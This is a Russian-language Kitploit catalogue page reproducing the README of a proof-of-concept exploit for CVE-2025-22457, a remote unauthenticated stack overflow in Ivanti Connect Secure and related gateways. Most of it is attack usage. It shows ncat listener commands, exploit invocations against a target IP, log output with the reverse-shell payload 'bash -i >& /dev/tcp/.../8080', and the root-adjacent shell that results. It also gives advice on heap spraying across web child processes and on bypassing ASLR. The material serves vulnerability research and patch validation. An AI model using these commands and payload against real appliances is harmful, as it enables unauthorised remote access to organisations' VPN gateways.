Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-22457 — PoC для CVE-2025-22457 — удалённое неаутентифицированное переполнение буфера на основе стека, затрагивающее Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure и ZTA Gateways | Kitploit
Инструменты/GitHubGitHub/sfewer-r7/cve-2025-22457
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного ДоступаЭксплуатация Бинарных Файлов
GitHubsfewer-r7/cve-2025-22457

CVE-2025-22457

PoC для CVE-2025-22457 — удалённое неаутентифицированное переполнение буфера на основе стека, затрагивающее Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure и ZTA Gateways

73151 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

PoC для CVE-2025-22457

Удалённое неаутентифицированное переполнение буфера на основе стека, затрагивающее Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure и ZTA Gateways

Обзор

Это эксплойт типа proof of concept, демонстрирующий эксплуатацию CVE-2025-22457. Полный технический анализ уязвимости и стратегии эксплуатации см. в нашем анализе Rapid7 здесь:

https://attackerkb.com/topics/0ybGQIkHzR/cve-2025-22457/rapid7-analysis

Использование

Мы можем запустить этот скрипт против уязвимой цели Ivanti Connect Secure версии 22.7r2.4 следующим образом:

Запустите прослушиватель netcat, чтобы поймать обратную оболочку.

root@kitploit:~
C:\>ncat -lnvkp 8080

Запустите эксплойт и переберите ASLR (это будет медленно).

root@kitploit:~
C:\>ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf64ca000
[2025-04-10 16:21:13 +0100]     Making connections...
[2025-04-10 16:21:18 +0100]     Spraying...
[2025-04-10 16:22:27 +0100]     Triggering..

Когда всё сработает, вы получите обратную оболочку.

root@kitploit:~
C:\>ncat -lnvkp 8080
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 192.168.86.111.
Ncat: Connection from 192.168.86.111:20746.
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.2$ id
id
uid=104(nr) gid=104(nr) groups=104(nr)
bash-4.2$ uname -a
uname -a
Linux localhost2 4.17.00.35-selinux-jailing-production #1 SMP Tue Jun 18 16:25:33 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$

Отладка

Дочерние процессы web

В зависимости от базового оборудования количество процессоров, доступных целевому устройству, определяет количество дочерних процессов, которые порождает бинарник /home/bin/web. Поскольку все входящие HTTPS-запросы распределяются равномерно между этими дочерними процессами, нам нужно учитывать это и выполнять распыление кучи (heap spray) достаточное количество раз для всех дочерних процессов. Это необходимо, потому что при срабатывании уязвимости мы не можем знать, в каком дочернем процессе она сработает. Поэтому нам нужно, чтобы heap spray присутствовал в каждом дочернем процессе.

  • 1 vCPU — 1 веб-процесс, без дочерних процессов
  • 2 vCPU — 1 родительский веб-процесс, 2 дочерних
  • 4 vCPU — 1 родительский веб-процесс, 4 дочерних (это значение по умолчанию и соответствует платформе Ivanti Connect Secure ISA4000-V)
  • 8 vCPU — 1 родительский веб-процесс, 8 дочерних (соответствует платформе Ivanti Connect Secure ISA6000-V)

Например, на рутованном уязвимом устройстве выполните следующее, чтобы увидеть количество дочерних процессов /home/bin/web:

root@kitploit:~
bash-4.2# ps -Al | grep web
ps -Al | grep web
4 S   104  3012  2394  0  80   0 - 26313 -      ?        00:00:00 web
4 S   104  3013  2394  0  80   0 - 24931 -      ?        00:00:00 web80
1 S   104  4947  3012  2  80   0 - 28209 -      ?        00:01:27 web
1 S   104  5217  3012  1  80   0 - 31527 -      ?        00:00:49 web
1 S   104  5695  3012  0  80   0 - 28199 -      ?        00:00:00 web
1 S   104  5715  3012  0  80   0 - 28199 -      ?        00:00:00 web
bash-4.2#

Вы можете указать ожидаемое количество дочерних процессов web с помощью аргумента --web_children, например:

root@kitploit:~
C:\>ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080 --web_children 4

Базовый адрес libdsplibs

Если вы тестируете PoC в локальной системе, возможно, вы захотите избежать перебора базового адреса libdsplibs. В этом случае вы можете передать PoC известный базовый адрес через аргумент --libdsplibs. Например, на рутованном уязвимом устройстве выполните следующее:

root@kitploit:~
bash-4.2# ps -A| grep web
ps -A| grep web
 3200 ?        00:00:01 web80
20536 ?        00:00:02 web
bash-4.2# cat /proc/20536/maps | grep libdsplibs
cat /proc/20536/maps | grep libdsplibs
f642e000-f7994000 r-xp 00000000 fc:02 171879                             /home/lib/libdsplibs.so
f7994000-f7995000 ---p 01566000 fc:02 171879                             /home/lib/libdsplibs.so
f7995000-f79aa000 r--p 01566000 fc:02 171879                             /home/lib/libdsplibs.so
f79aa000-f79e3000 rw-p 0157b000 fc:02 171879                             /home/lib/libdsplibs.so
bash-4.2#

Затем вы можете передать известный базовый адрес в PoC следующим образом:

root@kitploit:~
C:\>ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080 --web_children 4 --libdsplibs 0xf642e000
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf642e000
[2025-04-10 16:21:13 +0100]     Making connections...
[2025-04-10 16:21:18 +0100]     Spraying...
[2025-04-10 16:22:27 +0100]     Triggering...
Скачать инструмент